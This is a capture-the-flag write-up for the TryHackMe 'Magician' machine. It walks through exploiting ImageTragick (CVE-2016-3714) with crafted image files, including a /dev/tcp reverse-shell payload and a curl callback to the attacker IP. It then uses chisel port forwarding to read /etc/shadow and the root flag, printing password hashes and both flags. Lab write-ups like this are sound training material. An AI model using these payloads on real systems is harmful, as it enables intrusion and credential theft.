Magician (ImageTragick, Port Forwarding)
First, we need to enumerate using nmap.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician
╰─➤ nmap -A 10.10.208.142 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-27 08:02 +0630
Nmap scan report for magician (10.10.208.142)
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.90 secondsPort 21
When I connect to ftp with anonymous user, I got error.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician
╰─➤ ftp magician
Connected to magician.
220 THE MAGIC DOOR
Name (magician:hnl): anonymous
331 Please specify the password.
Password:
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp>
ftp> ls
550 Permission denied.
ftp: bind: Address already in usePort 8081
When you browse to http://magician:8081/, you will see this interface.
With burp, I can intercept the data when I upload custom png file.
The response said, I got successfully uploaded.
How about exploit.php?? Wow! I successfully uploaded.
Call back this url to get reverse shell. But I got error.
curl http://magician:8080/files/shell.phpThis vulnerability come with CVE-2016-3714. You can read the full article at https://mukarramkhalid.com/imagemagick-imagetragick-exploit/. Here is exploit.png from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Picture%20Image%20Magik/imagetragik1_payload_url_curl.png.
push graphic-context
viewbox 0 0 640 480
fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "10.9.0.82)'
pop graphic-contextIn this screenshot, we can see the exploit.png is working.
Let's upload a reverse shell. Here is a rce from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Picture%20Image%20Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/10.9.0.82/9001 0<&1 2>&1'
pop graphic-context
pop graphic-contextIn netcat session, we got a revere shell.
User
Let's spawn a TTY shell.
sh-4.4$ /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'Read the user flag.
sh-4.4$ cd
cd l
sh-4.4$ s -al
ls -al
total 17204
drwxr-xr-x 5 magician magician 4096 Feb 13 2021 .
drwxr-xr-x 3 root root 4096 Jan 30 2021 ..
lrwxrwxrwx 1 magician magician 9 Feb 6 2021 .bash_history -> /dev/null
-rw-r--r-- 1 magician magician 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 magician magician 3771 Apr 4 2018 .bashrc
drwx------ 2 magician magician 4096 Jan 30 2021 .cache
drwx------ 3 magician magician 4096 Jan 30 2021 .gnupg
-rw-r--r-- 1 magician magician 807 Apr 4 2018 .profile
-rw-r--r-- 1 magician magician 0 Jan 30 2021 .sudo_as_admin_successful
-rw------- 1 magician magician 7546 Jan 31 2021 .viminfo
-rw-r--r-- 1 root root 17565546 Jan 30 2021 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar
-rw-r--r-- 1 magician magician 170 Feb 13 2021 the_magic_continues
drwxr-xr-x 2 root root 4096 Feb 5 2021 uploads
-rw-r--r-- 1 magician magician 24 Jan 30 2021 user.txt
sh-4.4$ cat user.txt
cat user.txt
THM{simsalabim_hex_hex}Root
You can see some opened port using netstat command.
sh-4.4$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:6666 0.0.0.0:* LISTEN -
tcp 0 299 10.10.210.247:41436 10.9.0.82:9001 ESTABLISHED 1374/sh
tcp6 0 0 :::8080 :::* LISTEN 951/java
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 10.10.210.247:8080 10.9.0.82:54102 ESTABLISHED 951/java Download chisel to forward port.
sh-4.4$ wget http://10.9.0.82:1234/chisel;chmod 777 chiselLet's forward port.
# Server (listen at chisel server port 8000)
./chisel server -p 8000 --reverse
# Client
./chisel client 10.9.0.82:8000 R:9999:localhost:6666
(connect chisel server port 8000, bind our machine port with 9999, victim port 6666)When you browse http://127.0.0.1:9999, you file see "Enter filename" input field. I put /etc/shadow.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician
╰─➤ echo 'cm9vdDokNiROSGdnd2R1ZSQueUl2YS5iVzV0TXJZc3I1bWxUTi90cXdhZXdONXM4ZmtiUTlyRTdTeTBUVXRqeFNac21xSGIycUwvUjVtajdJdEtHeHdiT2JxUFBqV2wxbGFIVThlMDoxODY2MzowOjk5OTk5Ojc6OjoKZGFlbW9uOio6MTg0ODA6MDo5OTk5OTo3Ojo6CmJpbjoqOjE4NDgwOjA6OTk5OTk6Nzo6OgpzeXM6KjoxODQ4MDowOjk5OTk5Ojc6OjoKc3luYzoqOjE4NDgwOjA6OTk5OTk6Nzo6OgpnYW1lczoqOjE4NDgwOjA6OTk5OTk6Nzo6OgptYW46KjoxODQ4MDowOjk5OTk5Ojc6OjoKbHA6KjoxODQ4MDowOjk5OTk5Ojc6OjoKbWFpbDoqOjE4NDgwOjA6OTk5OTk6Nzo6OgpuZXdzOio6MTg0ODA6MDo5OTk5OTo3Ojo6CnV1Y3A6KjoxODQ4MDowOjk5OTk5Ojc6OjoKcHJveHk6KjoxODQ4MDowOjk5OTk5Ojc6OjoKd3d3LWRhdGE6KjoxODQ4MDowOjk5OTk5Ojc6OjoKYmFja3VwOio6MTg0ODA6MDo5OTk5OTo3Ojo6Cmxpc3Q6KjoxODQ4MDowOjk5OTk5Ojc6OjoKaXJjOio6MTg0ODA6MDo5OTk5OTo3Ojo6CmduYXRzOio6MTg0ODA6MDo5OTk5OTo3Ojo6Cm5vYm9keToqOjE4NDgwOjA6OTk5OTk6Nzo6OgpzeXN0ZW1kLW5ldHdvcms6KjoxODQ4MDowOjk5OTk5Ojc6OjoKc3lzdGVtZC1yZXNvbHZlOio6MTg0ODA6MDo5OTk5OTo3Ojo6CnN5c2xvZzoqOjE4NDgwOjA6OTk5OTk6Nzo6OgptZXNzYWdlYnVzOio6MTg0ODA6MDo5OTk5OTo3Ojo6Cl9hcHQ6KjoxODQ4MDowOjk5OTk5Ojc6OjoKbHhkOio6MTg0ODA6MDo5OTk5OTo3Ojo6CnV1aWRkOio6MTg0ODA6MDo5OTk5OTo3Ojo6CmRuc21hc3E6KjoxODQ4MDowOjk5OTk5Ojc6OjoKbGFuZHNjYXBlOio6MTg0ODA6MDo5OTk5OTo3Ojo6CnBvbGxpbmF0ZToqOjE4NDgwOjA6OTk5OTk6Nzo6Ogpzc2hkOio6MTg2NTc6MDo5OTk5OTo3Ojo6Cm1hZ2ljaWFuOiQ2JG5CSXpRMmpHL3dlOTFMMFokaVdhVS9nOFowSmdnTnk3VlJtUUVCMTVqZkFXVHN5ZEZqQk9CUThhTjVULzBib2JjeUFiUFI0Z3FVcHZBTktFWDJyUWJRbm5pYW9IU2xSNXdYT2Vrby46MTg2NTc6MDo5OTk5OTo3Ojo6CmZ0cDoqOjE4NjU3OjA6OTk5OTk6Nzo6Ogo=' | base64 -d
root:$6$NHggwdue$.yIva.bW5tMrYsr5mlTN/tqwaewN5s8fkbQ9rE7Sy0TUtjxSZsmqHb2qL/R5mj7ItKGxwbObqPPjWl1laHU8e0:18663:0:99999:7:::
daemon:*:18480:0:99999:7:::
bin:*:18480:0:99999:7:::
sys:*:18480:0:99999:7:::
sync:*:18480:0:99999:7:::
games:*:18480:0:99999:7:::
man:*:18480:0:99999:7:::
lp:*:18480:0:99999:7:::
mail:*:18480:0:99999:7:::
news:*:18480:0:99999:7:::
uucp:*:18480:0:99999:7:::
proxy:*:18480:0:99999:7:::
www-data:*:18480:0:99999:7:::
backup:*:18480:0:99999:7:::
list:*:18480:0:99999:7:::
irc:*:18480:0:99999:7:::
gnats:*:18480:0:99999:7:::
nobody:*:18480:0:99999:7:::
systemd-network:*:18480:0:99999:7:::
systemd-resolve:*:18480:0:99999:7:::
syslog:*:18480:0:99999:7:::
messagebus:*:18480:0:99999:7:::
_apt:*:18480:0:99999:7:::
lxd:*:18480:0:99999:7:::
uuidd:*:18480:0:99999:7:::
dnsmasq:*:18480:0:99999:7:::
landscape:*:18480:0:99999:7:::
pollinate:*:18480:0:99999:7:::
sshd:*:18657:0:99999:7:::
magician:$6$nBIzQ2jG/we91L0Z$iWaU/g8Z0JggNy7VRmQEB15jfAWTsydFjBOBQ8aN5T/0bobcyAbPR4gqUpvANKEX2rQbQnniaoHSlR5wXOeko.:18657:0:99999:7:::
ftp:*:18657:0:99999:7:::Cracking root password is tricky. Reading root flag directly.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician
╰─➤ echo 'VEhNe21hZ2ljX21heV9tYWtlX21hbnlfbWVuX21hZH0K' | base64 -d
THM{magic_may_make_many_men_mad}Last updated
Was this helpful?